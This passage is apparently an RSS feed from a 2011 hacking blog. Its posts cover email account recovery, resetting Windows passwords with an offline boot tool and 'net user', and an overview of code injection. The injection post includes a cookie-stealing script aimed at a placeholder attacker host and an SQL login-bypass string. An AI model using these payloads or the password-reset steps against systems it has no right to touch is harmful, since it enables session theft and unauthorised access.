&lt;a href=&quot;http://www.google.com/support/accounts/bin/request.py?ara=1&quot;&gt;Account Recovery Form &lt;/a&gt;&lt;/div&gt;&lt;h2 style=&quot;font: 1.4em Arial; margin: 0px; padding: 0px;&quot;&gt;For Yahoo and&amp;nbsp;Hotmail:&lt;/h2&gt;&lt;div style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;margin: 0px 0px 15px; padding: 0px; text-align: justify;&quot;&gt;Unfortunately for Yahoo/Hotmail there is no second option like filling out the form or contacting the support team. All you need to do is either answer the secret questions&amp;nbsp;that you have setup or reset the password using the secondary email option.&amp;nbsp;&lt;/div&gt;&lt;div style=&quot;margin: 0px 0px 15px; padding: 0px; text-align: justify;&quot;&gt;To initiate the password reset process just click on the&amp;nbsp;&lt;b style=&quot;margin: 0px; padding: 0px;&quot;&gt;&lt;span style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: underline;&quot;&gt;Forgot password link&lt;/span&gt;&lt;/b&gt;&amp;nbsp;in your&amp;nbsp;login page and proceed as per the screen instructions.&lt;/div&gt;&lt;div style=&quot;margin: 0px; padding: 0px; text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;margin: 0px 0px 15px; padding: 0px; text-align: justify;&quot;&gt;I hope this post will help you to recover the lost account. Because it is not easy to remember all the details for your account those google required, that&#39;s why I personally recommend you not to disclose your personal informations with anyone about your account.&lt;/div&gt;&lt;/div&gt;</description><link>http://amit-spot.blogspot.com/2011/01/recover-hacked-e-mail-account.html</link><author>noreply@blogger.com (Amit Tyagi)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1eHSbY8b9zxj4NmeSzfaRXR_OM441ijyJgn4XzFBJ4CPTD5xu9SL58ljVSyLkD0F-Fo_bbR5fMWAS7nnyD98zxirHjo389JYbZIYMwdV4uixGDvUzehopgbPwqtJBff6-0Fl0qYFlN10/s72-c/ammm.jpg" height="72" width="72"/><thr:total>1</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4201259273499093708.post-6671723216539213082</guid><pubDate>Mon, 17 Jan 2011 02:29:00 +0000</pubDate><atom:updated>2011-02-24T03:28:59.383-08:00</atom:updated><title>Hack Windows Administrator Password-</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica; font-size: 14px; line-height: 24px;&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidd9V0svmt_lcx1iHdN4xvVUuZMRZqHKfD7ACFz57bb_VqDh0OqIB3NgtzwDSeK3H0lEM1b1xdIAjrcxz52lkVLXNvoZe0lwpAMEkkqK3VJrTzdjCRero0rUZkk-xSxB2nsN8MQAdAUYA/s1600/index.jpeg&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidd9V0svmt_lcx1iHdN4xvVUuZMRZqHKfD7ACFz57bb_VqDh0OqIB3NgtzwDSeK3H0lEM1b1xdIAjrcxz52lkVLXNvoZe0lwpAMEkkqK3VJrTzdjCRero0rUZkk-xSxB2nsN8MQAdAUYA/s1600/index.jpeg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
This hack will show you how to reset Windows administrator password (for Win 2000, XP, Vista and Win 7) at times when you forget it or when you want to gain access to a computer for which you do not know the password.&lt;/div&gt;&lt;div style=&quot;margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;&quot;&gt;Most of us have experienced a situation where in we need to gain access to&amp;nbsp;a computer which is password protected or at times we may forget the administrator password without which it becomes impossible to login to the computer. So here is an excellent hack&amp;nbsp;using which you can reset&amp;nbsp;the password or make the password&amp;nbsp;empty (remove the password) so that you can gain&amp;nbsp;administrator access to the&amp;nbsp;computer.&amp;nbsp;You can do this with a small tool called &amp;nbsp;&lt;a href=&quot;http://pogostick.net/~pnh/ntpasswd/&quot; style=&quot;font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: underline;&quot; target=&quot;_blank&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;Offline NT Password &amp;amp; Registry Editor&lt;/span&gt;&lt;/a&gt;. This utility works offline, that means you need to shut down your computer and boot off your using a floppy disk, CD or USB device (such as pen drive). The tool has the following features.&lt;/div&gt;&lt;ul style=&quot;margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;&lt;li style=&quot;list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;You do not need to know the old password to set a new one&lt;/li&gt;
&lt;li style=&quot;list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;Will detect and offer to unlock locked or disabled out user accounts!&lt;/li&gt;
&lt;li style=&quot;list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;There is also a registry editor and other registry utilities that works under linux/unix, and can be used for other things than password editing.&lt;/li&gt;
&lt;/ul&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;&lt;/div&gt;&lt;h3 style=&quot;color: #303030; font-weight: bold; font: normal normal normal 1.25em/normal Arial; margin-bottom: 3px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;How it works?&lt;/h3&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;&quot;&gt;Most Windows operating systems stores the login passwords and other encrypted passwords in a file called&amp;nbsp;&lt;strong style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: red;&quot;&gt;sam&lt;/span&gt;&amp;nbsp;&lt;/strong&gt;(Security Accounts Manager). This file can be usually found in&amp;nbsp;\windows\system32\config. This file is a part of Windows registry and remains inaccessible as long as the OS is active.&amp;nbsp;Hence it is necessary that you need to boot off&amp;nbsp;your computer and access this sam file via boot. This tool intelligently&amp;nbsp;gains access to this file and will reset/remove the password&amp;nbsp;associated with administrator or any other account.&lt;/div&gt;&lt;div style=&quot;margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;The download link&amp;nbsp;for both CD and&amp;nbsp;floppy drives&amp;nbsp;along with the complete instructions is given below&lt;/div&gt;&lt;div style=&quot;margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;&lt;a href=&quot;http://pogostick.net/~pnh/ntpasswd/bootdisk.html&quot; style=&quot;font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: underline;&quot; target=&quot;_blank&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;Offline NT Password &amp;amp; Reg Editor Download&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;&quot;&gt;It is recommended that you download the CD version of the tool since floppy drive is outdated and doesn’t exist in today’s computer. Once you download you’ll get a bootable image which you need to burn it onto your CD. Now boot your computer from this CD and follow the screen instructions to reset the password.&lt;/div&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;&lt;/div&gt;&lt;h3 style=&quot;color: #303030; font-weight: bold; font: normal normal normal 1.25em/normal Arial; margin-bottom: 3px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;Another simple way to reset non-administrator account passwords&lt;/h3&gt;&lt;div style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;&quot;&gt;Here is another simple way through which you can reset the password of any non-administrator accounts. The only requirement for this is that you need to have administrator privileges. Here is a step-by-step instruction to accomplish this task.&lt;/div&gt;&lt;div style=&quot;margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;1. Open&amp;nbsp;the command prompt (&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: red;&quot;&gt;Start-&amp;gt;Run-&amp;gt;type&amp;nbsp;&lt;/span&gt;&lt;strong style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: red;&quot;&gt;cmd&lt;/span&gt;&lt;/strong&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: red;&quot;&gt;-&amp;gt;Enter&lt;/span&gt;)&lt;/div&gt;&lt;div style=&quot;margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;2. Now type&amp;nbsp;&lt;strong style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: red;&quot;&gt;net user&lt;/span&gt;&lt;/strong&gt;&amp;nbsp;and hit Enter&lt;/div&gt;&lt;div style=&quot;margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;3. Now the system will show you a list of user accounts on the computer. Say for example you need to reset the password of the account by name&amp;nbsp;&lt;strong style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: red;&quot;&gt;John&lt;/span&gt;&lt;/strong&gt;, then do as follows&lt;/div&gt;&lt;div style=&quot;margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;4. Type&amp;nbsp;&lt;strong style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: red;&quot;&gt;net user John *&lt;/span&gt;&lt;/strong&gt;&amp;nbsp;and hit Enter. Now the system will ask you to enter the new password for the account. That’s it. Now you’ve successfully reset the password for John without knowing his old password.&lt;/div&gt;&lt;div style=&quot;margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;So in this way you can reset the password of any Windows account at times when you forget it so that you need not re-install your OS for any reason. I hope this helps&lt;/div&gt;&lt;/div&gt;</description><link>http://amit-spot.blogspot.com/2011/01/hack-windows-administrator-password.html</link><author>noreply@blogger.com (Amit Tyagi)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidd9V0svmt_lcx1iHdN4xvVUuZMRZqHKfD7ACFz57bb_VqDh0OqIB3NgtzwDSeK3H0lEM1b1xdIAjrcxz52lkVLXNvoZe0lwpAMEkkqK3VJrTzdjCRero0rUZkk-xSxB2nsN8MQAdAUYA/s72-c/index.jpeg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4201259273499093708.post-9213050171899291181</guid><pubDate>Sun, 16 Jan 2011 13:49:00 +0000</pubDate><atom:updated>2011-01-16T05:49:43.643-08:00</atom:updated><title>PHP Injection-</title><description>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAyInOtKkMmN17oD4gQ4KJMOykL4gE6MIw4e8Z0dyFN0eKrwAsZjHwJruv76-e9XgYGcDi9Il4myR3X5y80vRKIQf5xNEtV2fb5WHsELnDXCcq2YM-Mtqy2DabeOkIfk8vh0JZoJCpg_0/s1600/images.jpeg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;br /&gt;
&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAyInOtKkMmN17oD4gQ4KJMOykL4gE6MIw4e8Z0dyFN0eKrwAsZjHwJruv76-e9XgYGcDi9Il4myR3X5y80vRKIQf5xNEtV2fb5WHsELnDXCcq2YM-Mtqy2DabeOkIfk8vh0JZoJCpg_0/s1600/images.jpeg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;h1 align=&quot;LEFT&quot; class=&quot;western&quot;&gt;Overview and example&lt;/h1&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0.5cm;&quot;&gt;A web server has a &quot;&lt;i&gt;Guest book&lt;/i&gt;&quot; script, which accepts small messages from users, and typically receives messages such as Nice site! However a malicious person may know of a code injection vulnerability in the &quot;Guest book&quot;, and enters a message such as  &lt;/div&gt;&lt;pre class=&quot;western&quot; style=&quot;margin-bottom: 0.5cm; text-align: left;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: purple;&quot;&gt;Nice Site,  I think I&#39;ll take it.&amp;gt;
&amp;lt;script&amp;gt;document.location=&#39;http://
some_attacker/cookie.cgi?&#39;
 +document.cookie&amp;lt;/script&lt;/span&gt;&lt;/pre&gt;&lt;div style=&quot;margin-bottom: 0.5cm;&quot;&gt; If another user views the page then the injected code will be executed. This code can allow the attacker to impersonate another user. However this same software bug can be accidentally triggered by an unassuming user which will cause the website to display bad HTML code.  &lt;/div&gt;&lt;pre class=&quot;western&quot; style=&quot;margin-bottom: 0.5cm;&quot;&gt;That post was awesome, :&amp;gt;) &lt;/pre&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0.5cm;&quot;&gt; In this case the &lt;a href=&quot;http://en.wikipedia.org/wiki/Emoticon&quot;&gt;emoticon&lt;/a&gt; would cause the HTML to be malformed because a malformed &lt;a href=&quot;http://en.wikipedia.org/wiki/HTML&quot;&gt;HTML&lt;/a&gt; tag was injected into the code. Most of these problems are related to erroneous assumptions of what input data is possible, or the effects of special data. Classic examples of dangerous assumptions a software developer might make about the input to a program includes:&lt;/div&gt;&lt;ul&gt;&lt;li&gt;&lt;div align=&quot;LEFT&quot;&gt;assuming that &lt;a href=&quot;http://en.wikipedia.org/wiki/Metacharacter&quot;&gt;metacharacters&lt;/a&gt;  for an API never occurs in an input; e.g. assuming punctuation like  quotation marks or semi-colons would never appear   &lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div align=&quot;LEFT&quot;&gt;assuming only numeric characters will be entered  as input   &lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div align=&quot;LEFT&quot;&gt;assuming the input will never exceed a certain  size   &lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div align=&quot;LEFT&quot;&gt;assuming that numeric values are equal or less  than upper bound   &lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div align=&quot;LEFT&quot;&gt;assuming that numeric values are equal or greater  than lower bound   &lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div align=&quot;LEFT&quot;&gt;assuming that client supplied values set by server  (such as hidden &lt;a href=&quot;http://en.wikipedia.org/wiki/Form_%28web%2529&quot;&gt;form&lt;/a&gt;  fields or &lt;a href=&quot;http://en.wikipedia.org/wiki/HTTP_Cookie&quot;&gt;cookies&lt;/a&gt;),  cannot be modified by client. This assumption ignores known attacks  such as &lt;a href=&quot;http://en.wikipedia.org/wiki/HTTP_Cookie&quot;&gt;Cookie&lt;/a&gt;  poisoning, in which values are set arbitrarily by malicious clients.   &lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div align=&quot;LEFT&quot;&gt;assuming that it is okay to pick pointers or array  indexes from input   &lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0.5cm;&quot;&gt;assuming an input  would never provide false information about itself or related  values, such as the size of a file   &lt;/div&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;h1 align=&quot;LEFT&quot; class=&quot;western&quot;&gt;Uses of Code Injection&lt;/h1&gt;&lt;h3 align=&quot;LEFT&quot;&gt;&lt;a href=&quot;&quot; name=&quot;Intentional_Use&quot;&gt;&lt;/a&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: red;&quot;&gt;Intentional Use-&lt;/span&gt;&lt;/h3&gt;&lt;h4 align=&quot;LEFT&quot;&gt;&lt;a href=&quot;&quot; name=&quot;Malevolent&quot;&gt;&lt;/a&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: red;&quot;&gt;Malevolent&lt;/span&gt;&lt;/h4&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0.5cm;&quot;&gt;Use of code injection is typically viewed as a malevolent action, and it often is. Code injection techniques are popular in system &lt;a href=&quot;http://en.wikipedia.org/wiki/Computer_hacking&quot;&gt;hacking&lt;/a&gt; or &lt;a href=&quot;http://en.wikipedia.org/wiki/Security_cracking&quot;&gt;cracking&lt;/a&gt; to gain information, &lt;a href=&quot;http://en.wikipedia.org/wiki/Privilege_escalation&quot;&gt;Privilege escalation&lt;/a&gt; or unauthorised access to a system. Code injection can be used malevolently to:  &lt;/div&gt;&lt;ul&gt;&lt;li&gt;&lt;div align=&quot;LEFT&quot;&gt;Arbitrarily modify values in a database through a  type of code injection called &lt;a href=&quot;http://en.wikipedia.org/wiki/SQL_injection&quot;&gt;SQL  injection&lt;/a&gt;. The impact of this can range from &lt;a href=&quot;http://en.wikipedia.org/wiki/Defacement_%28vandalism%2529&quot;&gt;defacement&lt;/a&gt;  of a web site to serious compromisation of sensitive data.   &lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div align=&quot;LEFT&quot;&gt;Install &lt;a href=&quot;http://en.wikipedia.org/wiki/Malware&quot;&gt;malware&lt;/a&gt;  on a computer by exploiting code injection vulnerabilities in a web  browser or its plugins when the user visits a malicious site.   &lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div align=&quot;LEFT&quot;&gt;Install &lt;a href=&quot;http://en.wikipedia.org/wiki/Malware&quot;&gt;malware&lt;/a&gt;  or execute malevolent code on a server, by &lt;b&gt;PHP&lt;/b&gt; or &lt;b&gt;ASP  Injection&lt;/b&gt;.   &lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div align=&quot;LEFT&quot;&gt;&lt;a href=&quot;http://en.wikipedia.org/wiki/Privilege_escalation&quot;&gt;Privilege  escalation&lt;/a&gt; to &lt;a href=&quot;http://en.wikipedia.org/wiki/Superuser&quot;&gt;root&lt;/a&gt;  permissions by exploiting &lt;b&gt;Shell Injection&lt;/b&gt; vulnerabilities in  a &lt;a href=&quot;http://en.wikipedia.org/wiki/Setuid&quot;&gt;setuid root&lt;/a&gt;  binary on UNIX.   &lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div align=&quot;LEFT&quot;&gt;&lt;a href=&quot;http://en.wikipedia.org/wiki/Privilege_escalation&quot;&gt;Privilege  escalation&lt;/a&gt; to &lt;a href=&quot;http://en.wikipedia.org/wiki/Superuser&quot;&gt;Local  System&lt;/a&gt; permissions by exploiting &lt;b&gt;Shell Injection&lt;/b&gt;  vulnerabilities in a service on Windows.   &lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0.5cm;&quot;&gt;Stealing  sessions/cookies from web browsers using &lt;b&gt;HTML/Script Injection&lt;/b&gt;  (&lt;a href=&quot;http://en.wikipedia.org/wiki/Cross-site_scripting&quot;&gt;Cross-site  scripting&lt;/a&gt;).   &lt;/div&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;h4 align=&quot;LEFT&quot;&gt;&lt;a href=&quot;&quot; name=&quot;Benevolent&quot;&gt;&lt;/a&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: red;&quot;&gt;Benevolent-&lt;/span&gt;&lt;/h4&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0.5cm;&quot;&gt;Some people may use code injections with good intentions. For example, changing or tweaking the behavior of a program or system through code injection can &quot;trick&quot; the system into behaving in a certain way without any malicious intent. For example:  &lt;/div&gt;&lt;ul&gt;&lt;li&gt;&lt;div align=&quot;LEFT&quot;&gt;Code injection could introduce a useful new column  that did not appear in the original design of a search results page.   &lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0.5cm;&quot;&gt;By using a field not  exposed in the default functions of the original design, a code  injection could offer a new way to filter, order, or group data.   &lt;/div&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0.5cm;&quot;&gt;Someone might resort to this sort of work-around for one of these reasons:  &lt;/div&gt;&lt;ul&gt;&lt;li&gt;&lt;div align=&quot;LEFT&quot;&gt;Other ways of modifying the software to function  as desired prove impossible, or   &lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div align=&quot;LEFT&quot;&gt;Other ways of modifying the software are  prohibitively costly, or   &lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0.5cm;&quot;&gt;Other ways of  modifying the software become too frustrating or painful.   &lt;/div&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0.5cm;&quot;&gt;The development community as a whole frowns on code injection for this purpose, calling it a kludge or &lt;a href=&quot;http://en.wikipedia.org/wiki/Hack_%28technology_slang%2529&quot;&gt;hack&lt;/a&gt;. Some developers allow or even promote the use of code injection to &quot;enhance&quot; their software, usually because this solution offers a less expensive way to implement new or specialized features. Unfortunately, the side effects and unaccounted implications can be very dangerous. In general, even well-intentioned use of code injection is discouraged.&lt;/div&gt;&lt;h3 align=&quot;LEFT&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: red;&quot;&gt;Unintentional Use-&lt;/span&gt;&lt;/h3&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0.5cm;&quot;&gt;Some users may unsuspectingly perform code injection because input they provide to a program was not considered by those who originally developed the system. For example:  &lt;/div&gt;&lt;ul&gt;&lt;li&gt;&lt;div align=&quot;LEFT&quot;&gt;What the user may consider a valid input may  contain token characters or character strings that have been  reserved by the developer to have special meaning (perhaps the &quot;&amp;amp;&quot;  in &quot;Shannon &amp;amp; Jason&quot;, or quotation marks as in &quot;Bub  &#39;Slugger&#39; McCracken&quot;).   &lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0.5cm;&quot;&gt;The user may submit a  malformed file as input that is handled gracefully in one  application, but is toxic to the receiving system.   &lt;/div&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0.5cm;&quot;&gt;&lt;a href=&quot;&quot; name=&quot;Preventing_Code_Injection&quot;&gt;&lt;/a&gt; Preventing Code Injection To prevent Code Injection problems, utilize &lt;a href=&quot;http://en.wikipedia.org/wiki/Secure_input_and_output_handling&quot;&gt;Secure input and output handling&lt;/a&gt;, such as:  &lt;/div&gt;&lt;ul&gt;&lt;li&gt;&lt;div align=&quot;LEFT&quot;&gt;Input validation   &lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div align=&quot;LEFT&quot;&gt;Escaping dangerous characters. For instance using  the &lt;code class=&quot;western&quot;&gt;addslashes()&lt;/code&gt; function in PHP to  protect against SQL Injection.   &lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div align=&quot;LEFT&quot;&gt;Input encoding   &lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div align=&quot;LEFT&quot;&gt;Output encoding   &lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0.5cm;&quot;&gt;OOther coding  practices which are not prone to Code Injection vulnerabilities,  such as &quot;parameterized SQL queries&quot; (also known as  &quot;prepared statements&quot; and sometimes &quot;bind  variables&quot;).   &lt;/div&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;h1 align=&quot;LEFT&quot; class=&quot;western&quot;&gt;Examples of Code Injection&lt;/h1&gt;&lt;h3 align=&quot;LEFT&quot;&gt;&lt;a href=&quot;&quot; name=&quot;SQL_Injection&quot;&gt;&lt;/a&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: red;&quot;&gt;SQL Injection-&lt;/span&gt;&lt;/h3&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0.5cm;&quot;&gt;&lt;a href=&quot;http://en.wikipedia.org/wiki/SQL_injection&quot;&gt;SQL injection/a&amp;gt; takes advantage of the syntax of SQL to inject commands that can read or modify a database, or compromise the meaning of the original query. For example, consider a web page has two fields to allow users to enter a user name and a password. The code behind the page will generate a &lt;/a&gt;&lt;a href=&quot;http://en.wikipedia.org/wiki/SQL&quot;&gt;SQL&lt;/a&gt; query to check the password against the list of user names:  &lt;/div&gt;&lt;pre class=&quot;western&quot; style=&quot;text-align: left;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: purple;&quot;&gt;SELECT UserList.Username
FROM UserList
WHERE UserList.Username = &#39;Username&#39;
AND UserList.Password = &#39;Password&#39;&lt;/span&gt;&lt;/pre&gt;&lt;div align=&quot;LEFT&quot; style=&quot;margin-bottom: 0.5cm;&quot;&gt; If this query returns any rows, then access is granted. However, if the malicious user enters a valid Username and injects some valid code (&lt;code class=&quot;western&quot;&gt;&quot;password&#39; OR &#39;1&#39;=&#39;1&quot;&lt;/code&gt;) in the Password field, then the resulting query will look like this:  &lt;/div&gt;&lt;pre class=&quot;western&quot; style=&quot;text-align: left;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: purple;&quot;&gt;SELECT UserList.Username
FROM UserList
WHERE UserList.Username = &#39;Username&#39;
